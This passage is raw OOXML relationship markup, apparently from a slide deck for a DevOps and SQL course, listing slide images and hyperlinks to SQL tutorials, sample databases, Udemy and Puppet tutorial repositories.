Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90C" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.udemy.com/course/mastering-devops-with-anil-dollor-2023/?referralCode=230B1BAB93602C62B90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gif"/></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1.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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gif"/></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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.apachefriends.org/download.html" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_create_db.asp" TargetMode="Externa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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_create_table.asp" TargetMode="Externa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0.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1.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_delete.asp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_delete.asp" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_delete.asp" TargetMode="Externa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4.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5.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_alias.asp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_alias.asp" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_alias.asp" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_alias.asp" TargetMode="Externa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0.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1.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3.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4.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_join_inner.asp" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_join_inner.asp" TargetMode="Externa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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_join_inner.asp" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_join_inner.asp" TargetMode="Externa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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_join_inner.asp" TargetMode="Externa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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_join_inner.asp"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0.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.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5.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.jp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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bbc.com/news/world-asia-30288542" TargetMode="Externa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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/func_mysql_ascii.asp" TargetMode="Externa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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/func_mysql_substring.asp" TargetMode="Externa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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/mysql/mysql_limit.asp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_top.asp" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image124.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_avg.asp" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_sum.asp" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_sum.asp" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_sum.asp" TargetMode="Externa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4.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5.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.pn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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image131.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image132.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image133.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image127.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image143.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.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youtube.com/oklabsguru"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2.jp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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harryho/db-samples/tree/master/mysql" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/harryho/db-samples/master/mysql/northwind_er_diagram.png" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_distinct.asp" TargetMode="Externa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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/sql_count.asp" TargetMode="Externa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7.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lerocha/chinook-database/tree/master/ChinookDatabase/DataSources" TargetMode="Externa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10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/airportdb/en/images/airportdb-schema.png" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Microsoft/sql-server-samples/releases/tag/wide-world-importers-v1.0" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.postgresql.org/ftp/projects/pgFoundry/dbsamples/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide510.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harryho/db-samples/tree/master/mysql" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.content.office.net/en-us/media/559a04f2-11b2-44b8-ae4a-92284d1576bd.png" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/redshift/latest/gsg/cm-dev-t-load-sample-data.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/redshift/latest/dg/c_sampledb.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harryho/db-samples/tree/master/mysql" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image159.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image141.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="Externa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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.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8.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.aws.amazon.com/images/redshift/latest/dg/images/tickitdb.pn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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image139.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1.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.imdb.com/non-commercial-datasets/" TargetMode="Externa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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.jpg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image219.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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/MySQL-Repair" TargetMode="Externa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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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7.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0.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1.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2.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3.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4.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/8.0/en/integer-types.html" TargetMode="Externa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7.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8.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sq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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3resource.com/sql-exercises/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sqlzoo.net/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pgexercises.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://exercism.org/tracks/plsql/exercises" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.codecademy.com/learn/learn-sql" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://leetcode.com/studyplan/top-sql-50/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlfiddle.com/" TargetMode="Externa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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/index-other.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/world-setup/en/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/datasets" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/lerocha/chinook-database/tree/master/ChinookDatabase/DataSources" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harryho/db-samples/tree/master/mysql" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/harryho/db-samples" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pgexercises.com/questions/basic/" TargetMode="Externa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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://data.gov/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://data.gov/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kaggle.com/datasets" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://kaggle.com/datasets" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rebasedata.com/convert-bak-to-mysql-online" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dataedo.com/samples/" TargetMode="Externa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3.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image216.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image147.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image170.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.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0.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1.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3.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4.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5.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7.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8.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image205.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image178.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image162.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image160.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.jp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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://puppet-server.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://puppet-agent1.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://puppet-agent1.dollorinfotech.com" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://puppet-agent3.dollorinfotech.com" TargetMode="Externa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4.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5.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.gif"/></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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/6Nov-Puppet-Master-Agent-Tutorial-/tree/master" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/PuppetServer---LocalDocker-Simulation/blob/main/README.md" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/anildalar/PuppetAgent---LocalDocker-Simulation/blob/main/README.md"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3.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0.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1.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image176.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image213.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image161.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image169.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image172.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image167.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image171.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image179.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image177.png"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image175.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image181.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image173.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image180.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17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8.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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image183.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image184.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image193.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image186.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image187.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image200.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image189.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image190.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image188.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image191.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image185.pn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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image196.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image202.png"/></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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image192.png"/></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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image194.pn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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image195.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image212.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image210.pn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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image198.pn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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image209.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image199.pn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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image201.pn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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image203.pn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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image204.pn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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image208.pn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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image211.pn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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image218.pn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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image223.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image206.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image214.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image217.pn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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image215.pn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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image222.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image220.png"/></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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image224.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image232.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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image227.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image221.pn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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://slideplayer.com/slide/12558458/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image229.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://slideplayer.com/slide/12558458/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kkchaulagain.medium.com/scaling-asterisk-using-kamailio-and-rtpproxy-a-step-by-step-guide-307eddaffd5" TargetMode="Externa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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 